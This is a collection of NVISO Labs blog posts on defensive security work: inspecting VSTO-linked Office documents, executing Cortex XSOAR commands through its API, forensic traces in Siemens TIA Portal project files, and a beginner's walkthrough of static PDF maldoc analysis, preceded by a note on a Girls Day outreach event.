All of our German offices were enthusiastically participating and welcomed our young guests on-site in Frankfurt and Munich for the day. “I don’t want to wait a year to come here,” said one of our participants from Frankfurt, while another girl from Munich is planning her internship with us now. These great feedbacks were due to an engaging agenda for the day, ranging from a live hacking demo of a well- known app to presentations of different fields of work within NVISO. Finding out what is “typical me”, instead of gender- based is a first step to identify potential future career paths.

We have an employee resource program called NEST (NVISO Equality: Stronger Together!) working on the continuous improvement of NVISO’s posture on diversity and inclusion. Throughout NEST, NVISO commits to keep being a great working environment, where all kinds of diversity are respected, as well as to act by example to bring a significant added value to the whole European cybersecurity community.

We believe, we made an impact – if the result results are still accurate today, 49% of girls attending the Girls Day said they can imagine working in this field that their visited company is operating in. We are looking forward to some Girls Day alumni in our new joiners!

If you have questions or want to apply straight away now, please reach out to the Girls Day Initiative Lead, Carola Wondrak, at [email protected] .

✇ NVISO Labs

Analyzing VSTO Office Files

By: didiernviso

VSTO Office files are Office document files linked to a Visual Studio Office File application. When opened, they launch a custom .NET application. There are various ways to achieve this, including methods to serve the VSTO files via an external web server.

An article was recently published on the creation of these document files for phishing purposes, and since then we have observed some VSTO Office files on VirusTotal.

Analysis Method (OOXML)

Sample Trusted Updater.docx (0/60 detections) appeared first on VirusTotal on 20/04/2022, 6 days after the publication of said article. It is a .docx file, and as can be expected, it does not contain VBA macros (per definition, .docm files contain VBA macros, .docx files do not):

Figure 1: typical VSTO document does not contain VBA code

Taking a look at the ZIP container (a .docx file is an OOXML file, i.e. a ZIP container containing XML files and other file types), there are some aspects that we don’t usually see in “classic” .docx files:

Figure 2: content of sample file

Worth noting is the following:

  1. The presence of files in a folder called vstoDataStore. These files contain metadata for the execution of the VSTO file.
  2. The timestamp of some of the files is not 1980-01-01, as it should be with documents created with Microsoft Office applications like Word.
  3. The presence of a docsProp/custom.xml file.

Checking the content of the custom document properties file, we find 2 VSTO related properties: _AssemblyLocation and _AssemblyName:

Figure 3: custom properties _AssemblyLocation and _AssemblyName

The _AssemblyLocation in this sample is a URL to download a VSTO file from the Internet. We were not able to download the VSTO file, and neither was VirusTotal at the time of scanning. Thus we can not determine if this sample is a PoC, part of a red team engagement or truly malicious. It is a fact though, that this technique is known and used by red teams like ours, prior to the publication of said article.

There’s little information regarding domain login03k[.]com, except that it appeared last year in a potential phishing domain list, and that VirusTotal tags it as DGA.

If the document uses a local VSTO file, then the _AssemblyLocation is not a URL:

Figure 4: referencing a local VSTO file

Analysis Method (OLE)

OLE files (the default Office document format prior to Office 2007) can also be associated with VSTO applications. We have found several examples on VirusTotal, but none that are malicious.
Therefore, to illustrate how to analyze such a sample, we converted the .docx maldoc from our first analysis, to a .doc maldoc.

Figure 5: analysis of .doc file

Taking a look at the metadata with oledump‘s plugin_metadata, we find the _AssemblyLocation and _AssemblyName properties (with the URL):

Figure 6: custom properties _AssemblyLocation and _AssemblyName

Notice that this metadata does not appear when you use oledump’s option -M:

Figure 7: olefile’s metadata result

Option -M extracts the metadata using olefile’s methods, and this olefile Python module (whereupon oledump relies) does not (yet) parse user defined properties.

Conclusion

To analyze Office documents linked with VSTO apps, search for custom properties _AssemblyLocation and _AssemblyName.

To detect Office documents like these, we have created some YARA rules for our VirusTotal hunting. You can find them on our Github here. Some of them are rather generic by design, and will generate too many hits for use in a production environment. They are originally designed for hunting on VT.

We will discus these rules in detail in a follow-up blog post, but we already wanted to share these with you.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Execute Commands Using The API

By: wstinkens

Introduction

Every automated task in Cortex XSOAR relies on executing commands from integrations or automations either in a playbook or directly in the incident war room or playground. But what if you wanted to incorporate a command or automation from Cortex XSOAR into your own custom scripts? For that you can use the API.

In the previous post in this series, we demonstrated how to use the Cortex XSOAR API in an automation. In this blog post, we will dive deeper into the API and show you how to execute commands using the Cortex XSOAR API.

To enable you to do this in your own automations, we have created a nitro_execute_api_command function which is available on the NVISO Github:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_execute_api_command.py

Cortex XSOAR API Endpoints

When reviewing the Cortex XSOAR API documentation, you can find the following API endpoints:

  • /entry: API to create an entry (markdown format) in existing investigation
  • /entry/execute/sync: API to create an entry (markdown format) in existing investigation

Based on the description it might not be obvious, but both can be used to execute commands using the API. An entry in an existing investigation can contain a command which can be executed in the context of an incident or in the Cortex XSOAR playground.

We will be using the /entry/execute/sync endpoint, because this will wait for the command to be completed and the API request will return the command’s result. The /entry endpoint only creates an entry in the war room/playground without returning the result.

A HTTP POST request to the /entry/execute/sync endpoint accepts the following request body:

{
  "args": {
    "string": "<<_advancearg>>"
  },
  "data": "string",
  "id": "string",
  "investigationId": "string",
  "markdown": true,
  "primaryTerm": 0,
  "sequenceNumber": 0,
  "version": 0
}

To execute a simple print command in the context of an incident, you can use the following curl command:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "423","data": "!Print value=\"Printed by API\""}
        '

The body of the HTTP POST request should contain the following keys:

  • investigationId: the XSOAR Incident ID
  • data: the command to execute

After executing the HTTP POST request, you will see the entry created in the incident war room:

When you do not require the command to be executed in the context of an Cortex XSOAR incident, it is possible to execute it in the playground. For this you should replace the investiationId key by the playground ID.

This can be found by using the investigation/search API endpoint:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/investigations/search' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"filter": {"type": [9]}}'

This will return the following response body:

{
  "total": 1,
  "data": [
    {
      "id": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
      "version": 2,
      "cacheVersn": 0,
      "modified": "2022-04-08T14:20:00.262348298Z",
      "name": "Playground",
      "users": [
        "wstinkens"
      ],
      "status": 0,
      "type": 9,
      "reason": null,
      "created": "2022-04-08T13:56:03.294180041Z",
      "closed": "0001-01-01T00:00:00Z",
      "lastOpen": "0001-01-01T00:00:00Z",
      "creatingUserId": "wstinkens",
      "details": "",
      "systems": null,
      "tags": null,
      "entryUsers": [
        "wstinkens"
      ],
      "slackMirrorType": "",
      "slackMirrorAutoClose": false,
      "mirrorTypes": null,
      "mirrorAutoClose": null,
      "category": "",
      "rawCategory": "",
      "runStatus": "",
      "highPriority": false,
      "isDebug": false
    }
  ]
}

By using the id in the investigationId key in the request body of a HTTP POST request to /entry/execute/sync, it will be executed in the Cortex XSOAR playground:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!Print value=\"Printed by API\""}'

By default, the Markdown output of the command visible in the war room/playground will be returned by the HTTP POST request:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!azure-sentinel-list-tables"}'

This will return the result of the command as Markdown in the contents key:

[
  {
    "id": "[email protected]",
    "version": 1,
    "cacheVersn": 0,
    "modified": "2022-04-27T10:49:23.872137691Z",
    "type": 1,
    "created": "2022-04-27T10:49:23.87206309Z",
    "incidentCreationTime": "2022-04-27T10:49:23.87206309Z",
    "retryTime": "0001-01-01T00:00:00Z",
    "user": "",
    "errorSource": "",
    "contents": "### Azure Sentinel (NITRO) List Tables\n401 tables found in Sentinel Log Analytics workspace.\n|Table name|\n|---|\n| UserAccessAnalytics |\n| UserPeerAnalytics |\n| BehaviorAnalytics |\n| IdentityInfo |\n| ProtectionStatus |\n| SecurityNestedRecommendation |\n| CommonSecurityLog |\n| SecurityAlert |\n| SecureScoreControls |\n| SecureScores |\n| SecurityRegulatoryCompliance |\n| SecurityEvent |\n| SecurityRecommendation |\n| SecurityBaselineSummary |\n| Update |\n| UpdateSummary |\n",
    "format": "markdown",
    "investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
    "file": "",
    "fileID": "",
    "parentId": "[email protected]",
    "pinned": false,
    "fileMetadata": null,
    "parentContent": "!azure-sentinel-list-tables",
    "parentEntryTruncated": false,
    "system": "",
    "reputations": null,
    "category": "artifact",
    "note": false,
    "isTodo": false,
    "tags": null,
    "tagsRaw": null,
    "startDate": "0001-01-01T00:00:00Z",
    "times": 0,
    "recurrent": false,
    "endingDate": "0001-01-01T00:00:00Z",
    "timezoneOffset": 0,
    "cronView": false,
    "scheduled": false,
    "entryTask": null,
    "taskId": "",
    "playbookId": "",
    "reputationSize": 0,
    "contentsSize": 10315,
    "brand": "Azure Sentinel (NITRO)",
    "instance": "QA-Azure Sentinel (NITRO)",
    "InstanceID": "e39e69f0-3882-4478-824d-ac41089381f2",
    "IndicatorTimeline": [],
    "Relationships": null,
    "mirrored": false
  }
]

To return the data of the executed command as JSON, you should add the raw-response=true parameter to your command:

curl -X 'POST' \
  'https://xsoar.dev/acc_wstinkens/entry/execute/sync' \
  -H 'accept: application/json' \
  -H 'Authorization: **********************' \
  -H 'Content-Type: application/json' \
  -d '{"investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb","data": "!azure-sentinel-list-tables raw-response=true"}'

This will return the result of the command as JSON in the contents key:

[
  {
    "id": "[email protected]",
    "version": 1,
    "cacheVersn": 0,
    "modified": "2022-04-27T06:34:59.448622878Z",
    "type": 1,
    "created": "2022-04-27T06:34:59.448396275Z",
    "incidentCreationTime": "2022-04-27T06:34:59.448396275Z",
    "retryTime": "0001-01-01T00:00:00Z",
    "user": "",
    "errorSource": "",
    "contents": [
      "UserAccessAnalytics",
      "UserPeerAnalytics",
      "BehaviorAnalytics",
      "IdentityInfo",
      "ProtectionStatus",
      "SecurityNestedRecommendation",
      "CommonSecurityLog",
      "SecurityAlert",
      "SecureScoreControls",
      "SecureScores",
      "SecurityRegulatoryCompliance",
      "SecurityEvent",
      "SecurityRecommendation",
      "SecurityBaselineSummary",
      "Update",
      "UpdateSummary",
    ],
    "format": "json",
    "investigationId": "248b2bc0-def4-4492-8c80-d5a7e03be9fb",
    "file": "",
    "fileID": "",
    "parentId": "[email protected]",
    "pinned": false,
    "fileMetadata": null,
    "parentContent": "!azure-sentinel-list-tables raw-response=\"true\"",
    "parentEntryTruncated": false,
    "system": "",
    "reputations": null,
    "category": "artifact",
    "note": false,
    "isTodo": false,
    "tags": null,
    "tagsRaw": null,
    "startDate": "0001-01-01T00:00:00Z",
    "times": 0,
    "recurrent": false,
    "endingDate": "0001-01-01T00:00:00Z",
    "timezoneOffset": 0,
    "cronView": false,
    "scheduled": false,
    "entryTask": null,
    "taskId": "",
    "playbookId": "",
    "reputationSize": 0,
    "contentsSize": 9402,
    "brand": "Azure Sentinel (NITRO)",
    "instance": "QA-Azure Sentinel (NITRO)",
    "InstanceID": "e39e69f0-3882-4478-824d-ac41089381f2",
    "IndicatorTimeline": [],
    "Relationships": null,
    "mirrored": false
  }
]

nitro_execute_api_command()

Even in Cortex XSOAR automations, executing commands through the API can be useful. When using automations, you will see that outputting results to the war room/playground and context data is only done after the automation has been executed. If you, for example, want to perform a task which requires the entry ID of a war room/playground entry or of a file, you will need to run 2 consequent automations. Another solution would be executing a command using the Cortex XSOAR API which will create the entry in the war room/playground during the runtime of your automation and returns it’s entry ID. Later in this post, we will provide an example of how this can be used.

To execute command through the API from automations, we have created the nitro_execute_api_command function:

def nitro_execute_api_command(command: str, args: dict = None):
    """Execute a command using the Demisto REST API

    :type command: ``str``
    :param command: command to execute
    :type args: ``dict``
    :param args: arguments of command to execute

    :return: list of returned results of command
    :rtype: ``list``
    """
    args = args or {}

    # build the command string in the form !Command arg1="val1" arg2="val2"
    cmd_str = f"!{command}"

    for key, value in args.items():
        if isinstance(value, dict):
            value = json.dumps(json.dumps(value))
        else:
            value = json.dumps(value)
        cmd_str += f" {key}={value}"

    results = nitro_execute_command("demisto-api-post", {
        "uri": "/entry/execute/sync",
        "body": json.dumps({
            "investigationId": demisto.incident().get('id', ''),
            "data": cmd_str
        })
    })

    if not isinstance(results, list) \
            or not len(results)\
            or not isinstance(results[0], dict):
        return []

    results = results[0].get("Contents", {}).get("response", [])
    for result in results:
        if "contents" in result:
            result["Contents"] = result.pop("contents")

    return results

To use this function, the Demisto REST API integration needs to be enabled. How to set this up is described in the previous post in this series.

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_api_command in all your custom automations.

Incident Evidences Example

To demonstrate the use case for executing commands through the Cortex XSOAR API in automations, we will, again, build upon the example of adding evidences to the incident Evidence board. In the previous posts, we added tags to war room/playground entries which we then used in a second automation to search and add them to the incident Evidences board. This required a playbook which execute both automations consequently.

Now we will show you how to do this through the Cortex XSOAR API, negating the requirement of a playbook.

First we need an automation which creates an entry in the incident war room:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
title = "Malware Mitigation Status"

return_results(
    CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True),
        raw_response=results
    )
)

This automation creates an entry in the incident war room:

We call this automation using the nitro_execute_api_command function:

results = nitro_execute_api_command(command='MalwareStatus')

The entry ID of the war room entry will be available in the returned result in the id key:

[
    {
        "IndicatorTimeline": [],
        "InstanceID": "ScriptServicesModule",
        "Relationships": null,
        "brand": "Scripts",
        "cacheVersn": 0,
        "category": "artifact",
        "contentsSize": 152,
        "created": "2022-04-27T08:37:29.197107197Z",
        "cronView": false,
        "dbotCreatedBy": "wstinkens",
        "endingDate": "0001-01-01T00:00:00Z",
        "entryTask": null,
        "errorSource": "",
        "file": "",
        "fileID": "",
        "fileMetadata": null,
        "format": "markdown",
        "id": "[email protected]",
        "incidentCreationTime": "2022-04-27T08:37:29.197107197Z",
        "instance": "Scripts",
        "investigationId": "6974",
        "isTodo": false,
        "mirrored": false,
        "modified": "2022-04-27T08:37:29.197139897Z",
        "note": false,
        "parentContent": "!MalwareStatus",
        "parentEntryTruncated": false,
        "parentId": "[email protected]",
        "pinned": false,
        "playbookId": "",
        "recurrent": false,
        "reputationSize": 0,
        "reputations": null,
        "retryTime": "0001-01-01T00:00:00Z",
        "scheduled": false,
        "startDate": "0001-01-01T00:00:00Z",
        "system": "",
        "tags": null,
        "tagsRaw": null,
        "taskId": "",
        "times": 0,
        "timezoneOffset": 0,
        "type": 1,
        "user": "",
        "version": 1,
        "Contents": "### Malware Mitigation Status\n|DetectionStatus|FileName|FilePath|\n|---|---|---|\n| Detected | malware.exe | c:\\temp |\n| Prevented | evil.exe | c:\\temp |\n"
    }
]

Next, we get all entry IDs from the results of nitro_execute_api_command:

entry_ids = [result.get('id') for result in results]

Finally we loop through all entry IDs in the nitro_execute_api_command result and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The war room entry created by the command executed through the Cortex XSOAR API will now be added to the Evidence Board of the incident:

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-6/cortex-xsoar-admin/incidents/incident-management/war-room-overview

https://xsoar.pan.dev/docs/concepts/concepts#playground

https://xsoar.pan.dev/marketplace/details/DemistoRESTAPI

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the SOAR engineering team lead, he is responsible for the development and deployment of automated workflows which enable the NVISO SOC analysts to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can contact Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

Investigating an engineering workstation – Part 3

By: Olaf Schwarz

In our third blog post (part one and two are referenced above) we will focus on information we can get from the projects itself.

You may remember from Part 1 that a project created with the TIA Portal is not a single file. So far we talked about files with the “.apXX” extension, like “.ap15_1” in our example. Actually these files are used to open projects in the TIA Portal but they do not contain all the information that makes up a project. If you open an “.ap15_1” file there is not much to see as demonstrated below:

Figure 1: .at15_1 file content excerpt

The file we are actually looking for is named “PEData.plf” and located in the “System” folder stored within the “root” folder of the project. The “root” folder is also the location of the “.ap15_1” file.

Figure 2: Showing content of project “root” and “System” folder

As demonstrated below, the “PEData.plf” file is a binary file format and reviewing its content does not show any usefully information at first sight.

Figure 3: Hexdump of a PEData.plf file

But we can get useful information from the file if we know what to look for. When we compare the two “PEData” files of projects, where just some slight changes were performed, we can get a first idea how the file is structured. In the following example two variables were added to a data block, the project was saved, downloaded to the PLC and the TIA Portal was closed saving all changes to the project. (If you are confused with the wording “downloaded to the PLC”, do not worry about it too much for now. This is just the wording for getting the logic deployed on the PLC.)

The tool colordiff can provide a nice side-by-side view, with the differences highlighted, by using the following command. (The files were renamed for a better understanding):

colordiff -y <(xxd Original_state_PEData.plf) <(xxd CHANGES_MADE_PEData.plf)

Figure 4: colordiff output showing appended changes

The output shows that the changes made are appended to the “PEData.plf” file. Figure 4 shows the starting offset of the change, in our case at offset 0xA1395. We have performed multiple tests by applying small changes. In all cases, data was appended to the “PEData.plf” file. No data was overwritten or changed in earlier sections of the file.

To further investigate the changes, we extract the changes to a file:

dd skip=660373 if=CHANGES_MADE_PEData.plf of=changes.bin bs=1

We set the block size of the dd command to 1 and skip the first 660373 blocks (0xA1395 in hex). As demonstrated below, the resulting file, named “changes.bin”, has the size of 16794 bytes. Exactly the difference in size between the two files we compared.

Figure 5: Showing file sizes of compared files and the extracted changes

Trying to reverse engineer which bytes of the appended data might be header data and which is actual content, is way above the scope of this series of blog posts. But with the changes extracted and the use of tools like strings, we still get an insight on the activities.

Figure 6: Parts of strings output when run against “changes.bin” file

Looking through the whole output, we can immediately find out that the change ends with the string: “##CLOSE##”. This is also the only appearance of this specific string in the extracted changes. Further we can see that not far above the “##CLOSE##” string there is the string “$$COMMIT$”. In this case we will find two occurrences for this specific string, we will explain later why this might be the case.

Figure 7: String occurrences of “##CLOSE” and “$$COMMIT$” at the end of changes

The next string of interest is “PLUSBLOCK”, if you review figure 6, you will already notice it in the 8th line. In the current example we get three occurrences of this string. No worries if you are already lost in which string occurred how many times etc., we will provide an overview shortly. Before showing the overview, it will help to review more content of the strings output.

Below you can review the changes we introduced in “CHANGES_MADE_PEData.plf” compared to the project state represented by “Original_state_PEData.plf”.

Figure 8: Overview of changes made to the project

In essence, we added two variables to “Data_block_1”. These are the variables “DB_1_var3” and “DB_1_var4”. These variable names are also present in the extracted changes as shown in figure 9. Please note, this block occurs two times in our extracted changes, and also contains the already existing variable names “DB_1_var1” and “DB_1_var2”.

Figure 9: Block in “changes.bin” containing variables names

One section we need to mention before we can start drawing conclusions from the overview is the “DownloadLog” section, showing up just once in our changes. We will have a look at the content of this section and which behaviour we observed later in this blog post.

Overview and behaviour

As promised earlier, we finally start showing an overview.

Line number String / Section of interest
8 PLUSBLOCK
22 Section containing the variable names
35 $$COMMIT$
48 PLUSBLOCK
58 Section containing the variable names
61 PLUSBLOCK
78 Start of “DownloadLog”
101 $$COMMIT$
109 ##CLOSE#
Table 1: Overview of string occurrences in “changes.bin”

The following steps were performed while introducing the change:

  1. Copy existing project to new location & open the project from the new location using the TIA Portal
  2. Adding variables “DB_1_var3” and “DB_1_var4” to the already existing datablock “Data_block_1”
  3. Saving the project
  4. Downloading the project to the PLC
  5. Closing the TIA Portal and save all changes

The “$$COMMIT$” string in line 35 and 101 seems to be aligning with our actions in step 3 (saving the project) and step 4 & 5 (downloading the project & close and save). Following this theory, if we would skip step 3, we should not get two occurrences of the variable name section and would not see the string “$$COMMIT$” twice. In a second series of tests we did exactly this, resulting in the following overview (of course the line numbers differ, as a different project was used in testing).

Line number String / Section of interest
6 PLUSBLOCK
28 Section containing the variable names
35 PLUSBLOCK
40 Start of “DownloadLog”
70 $$COMMIT$
75 ##CLOSE#
Table 2: Overview of string occurrences in “changes.bin” for test run 2

This pretty much looks like what we expected, we only see one “$$COMMIT$”, one section with the variable names and one less “PLUSBLOCK”. To further validate the theory, we did another test by creating a new, empty project and downloaded it to the PLC (State 1). Afterwards we performed the following steps to reach State 2:

  1. Adding a new data block containing two variables
  2. Saving the project
  3. Adding two more variables to the data block (4 in total now)
  4. Saving the project
  5. Downloading the project to the PLC
  6. Closing the TIA Portal and save all changes

If we again just focus on the additions made to the “PEData.plf” we will get the following overview. Entries with “####” are comments we added to reference the steps mentioned above.

Line number String / Section of interest
11 PLUSBLOCK
32 Start of “DownloadLog”
194 Section containing the variable names (first two variables)
223 $$COMMIT$
#### Comment: above added by step 2 (saving the project)
237 PLUSBLOCK
266 Section containing the variable names (all four variables)
270 $$COMMIT$
#### Comment: above added by step 4 (saving the project)
273 PLUSBLOCK
278 Section containing the variable names (all four variables)
290 PLUSBLOCK
456 Start of “DownloadLog”
509 $$COMMIT$
513 ##CLOSE#
#### Comment: added by step 5 and 6
Table 3: Overview of string occurrences in test run 3

The occurrence of the “DownloadLog” at line 32 might come as a surprise to you at this point in time. As already stated earlier, the explanation of the “DownloadLog” will follow later. For now just accept that it is there.

Conclusions so far

Based on the observations described above, we can draw the following conclusions:

  1. Adding a change to a project and saving it will cause the following structure: “PLUSBLOCK”,…changes…, “$$COMMIT$”
  2. Adding a change to a project, saving it and closing the TIA Portal will cause the following structure: “PLUSBLOCK”,…changes…, “$$COMMIT$”,”##CLOSE#”
  3. Downloading changes to a PLC and choosing save when closing the TIA Portal causes the following structure: “PLUSBLOCK”,…changes…, “PLUSBLOCK”,DownloadLog, “$$COMMIT$”,”##CLOSE”
DownloadLog

The “DownloadLog” is a xml like structure, present in clear in the PEData.plf file. Figure 10 shows an example of a “DownloadLog”.

Figure 10: DownloadLog structure example

As you might have guessed already, the “DownloadTimeStamp” represents the date and time the changes were downloaded to the PLC. Date and time are written as Epoch Unix timestamp, and can be easily converted with tools like CyberChef using the appropriate recipe. If we take the last value ( “1641820395551408400” ) from the “DownloadLog” example and convert it, we can learn that there was a download to the PLC happening on Mon 10 January 2022 13:13:15.551 UTC. By definition Epoch Unix timestamps are in UTC, we can confirm that the times in our tests were created based on UTC and not on the local system time. Also demonstrated above, the “DownloadLog” can contain past timestamps, showing a kind of history in regards of download activities. Remember what was mentioned above, the changes to a project are appended to the file, this also is true for the “DownloadLog”. So an existing “DownloadLog” is not updated, instead a new one is appended and extended with a new “DownloadSet” node. Unfortunately, it is not as straight forward as it may sound at the moment.

Starting again with a fresh project, configuring the hardware (setting the IP-Address for the PLC), saving the project, downloading the project to the PLC and closing the TIA Portal (Save all changes) we ended up with one “DownloadLog” containing one “DownloadTimeStamp” in the PEData.plf file:

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″

As next step we added a data block, again saving the project, downloading it to the PLC and closing the TIA Portal saving all changes. This resulted in the following overview of “DownloadLog” entries:

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  2. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  3. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″

The first “DownloadLog” is repeated, and a third “DownloadLog” is added containing the date and time of the most recent download activity. So overall, two “DownloadLogs” were added.

In the third step we added variables to the data block followed by saving, downloading and closing TIA Portal with save.

  1. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  2. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
  3. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″
  4. DownloadLog
    • DownloadTimeStamp=”1639754084193097100″
    • DownloadTimeStamp=”1639754268869841200″
    • DownloadTimeStamp=”1639754601898276800″

This time only one “DownloadLog” was added, which repeats the content of “DownloadLog” number 3 and also contains the most recent date and time. We repeated the same actions of step 3 again, observing the same behaviour. One “DownloadLog” is added, which repeats the content of the previous “DownloadLog” and adds date and time of the current download activity. After doing this, we did not observed anymore “DownloadLog” entries added to the “PEdata.plf” file, no matter which changes we introduced and downloaded to the PLC. In further testing we encountered different behaviours of the “DownloadLog” and if it is repeated as a whole or not (Occurrence 2 in the examples above). Currently we believe that only 4 “DownloadLog” entries, showing new download activity, are added to the “PEData.plf” file. If a “DownloadLog” entry is just repeated, it is not counted.

Conclusion on the DownloadLog
  1. When “DownloadTimeStamp” entries are present in a “PEData.plf” file, they do represent download activity.
  2. If there are 4 unique “DownloadLog” entries in a “PEData.plf” file, we cannot tell (from the “PEData.plf” file) if there was any download activity after the most recent timestamp in the last occurrence of a unique “DownloadLog” entry.

Overall Conclusions & Outlook

We have shown that changes made to a project can be isolated and to a certain part analysed with tools like strings, xdd or diff. Further we have demonstrated that we can reconstruct download activity from a project, at least up to the first four download actions. Last but not least we can conclude that more testing and research has to be performed to get a better understanding of data points that can be extracted from projects. For example, we did not perform research to see if we can identify strings representing the project name or the author name for the project in the “PEData.plf” file without knowing them upfront. Further we only looked at the Siemens TIA Portal Version 15.1, different versions might produce other formats or behave in a different way. Further Siemens is not the only vendor that plays a relevant role in this area.

In the next part we will have a look at network traffic observed in out testing. Stay tuned!

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

✇ NVISO Labs

Analyzing a “multilayer” Maldoc: A Beginner’s Guide

By: didiernviso

In this blog post, we will not only analyze an interesting malicious document, but we will also demonstrate the steps required to get you up and running with the necessary analysis tools. There is also a howto video for this blog post.

I was asked to help with the analysis of a PDF document containing a DOCX file.

The PDF is REMMITANCE INVOICE.pdf, and can be found on VirusTotal, MalwareBazaar and Malshare (you don’t need a subscription to download from MalwareBazaar or Malshare, so everybody that wants to, can follow along).

The sample is interesting for analysis, because it involves 3 different types of malicious documents.
And this blog post will also be different from other maldoc analysis blog posts we have written, because we show how to do the analysis on a machine with a pristine OS and without any preinstalled analysis tools.


To follow along, you just need to be familiar with operating systems and their command-line interface.
We start with a Ubuntu LTS 20.0 virtual machine (make sure that it is up-to-date by issuing the “sudo apt update” and “sudo apt upgrade” commands). We create a folder for the analysis: /home/testuser1/Malware (we usually create a folder per sample, with the current date in the filename, like this: 20220324_twitter_pdf). testuser1 is the account we use, you will have another account name.

Inside that folder, we copy the malicious sample. To clearly mark the sample as (potentially) malicious, we give it the extension .vir. This also prevents accidental launching/execution of the sample. If you want to know more about handling malware samples, take a look at this SANS ISC diary entry.

Figure 1: The analysis machine with the PDF sample

The original name of the PDF document is REMMITANCE INVOICE.pdf, and we renamed it to REMMITANCE INVOICE.pdf.vir.
To conduct the analysis, we need tools that I develop and maintain. These are free, open-source tools, designed for static analysis of malware. Most of them are written in Python (a free, open-source programming language).
These tools can be found here and on GitHub.

PDF Analysis

To analyze a malicious PDF document like this one, we are not opening the PDF document with a PDF reader like Adobe Reader. In stead, we are using dedicated tools to dissect the document and find malicious code. This is known as static analysis.
Opening the malicious PDF document with a reader, and observing its behavior, is known as dynamic analysis.

Both are popular analysis techniques, and they are often combined. In this blog post, we are performing static analysis.

To install the tools from GitHub on our machine, we issue the following “git clone” command:

Figure 2: The “git clone” command fails to execute

As can be seen, this command fails, because on our pristine machine, git is not yet installed. Ubuntu is helpful and suggest the command to execute to install git:

sudo apt install git

Figure 3: Installing git
Figure 4: Installing git

When the DidierStevensSuite repository has been cloned, we will find a folder DidierStevensSuite in our working folder:

Figure 5: Folder DidierStevensSuite is the result of the clone command

With this repository of tools, we have different maldoc analysis tools at our disposal. Like PDF analysis tools.
pdfid.py and pdf-parser.py are two PDF analysis tools found in Didier Stevens’ Suite. pdfid is a simple triage tool, that looks for known keywords inside the PDF file, that are regularly associated with malicious activity. pdf-parser.py is able to parse a PDF file and identify basic building blocks of the PDF language, like objects.

To run pdfid.py on our Ubuntu machine, we can start the Python interpreter (python3), and give it the pdfid.py program as first parameter, followed by options and parameters specific for pdfid. The first parameter we provide for pdfid, is the name of the PDF document to analyze. Like this:

Figure 6: pdfid’s analysis report

In the report provided as output by pdfid, we see a bunch of keywords (first column) and a counter (second column). This counter simply indicates the frequency of the keyword: how many times does it appear in the analyzed PDF document?

As you can see, many counters are zero: keywords with zero counter do not appear in the analyzed PDF document. To make the report shorter, we can use option -n. This option excludes zero counters (n = no zeroes) from the report, like this:

Figure 7: pdfid’s condensed analysis report

The keywords that interest us the most, are the ones after the /Page keyword.
Keyword /EmbeddedFile means that the PDF contains an embedded file. This feature can be used for benign and malicious purposes. So we need to look into it.
Keyword /OpenAction means that the PDF reader should do something automatically, when the document is opened. Like launching a script.
Keyword /ObjStm means that there are stream objects inside the PDF document. Stream objects are special objects, that contain other objects. These contained objects are compressed. pdfid is in nature a simple tool, that is not able to recognize and handle compressed data. This has to be done with pdf-parser.py. Whenever you see stream objects in pdfid’s report (e.g., /ObjStm with counter greater than zero), you have to realize that pdfid is unable to give you a complete report, and that you need to use pdf-parser to get the full picture. This is what we do with the following command:

Figure 8: pdf-parser’s statistical report

Option -a is used to have pdf-parser.py produce a report of all the different elements found inside the PDf document, together with keywords like pdfid.py produces.
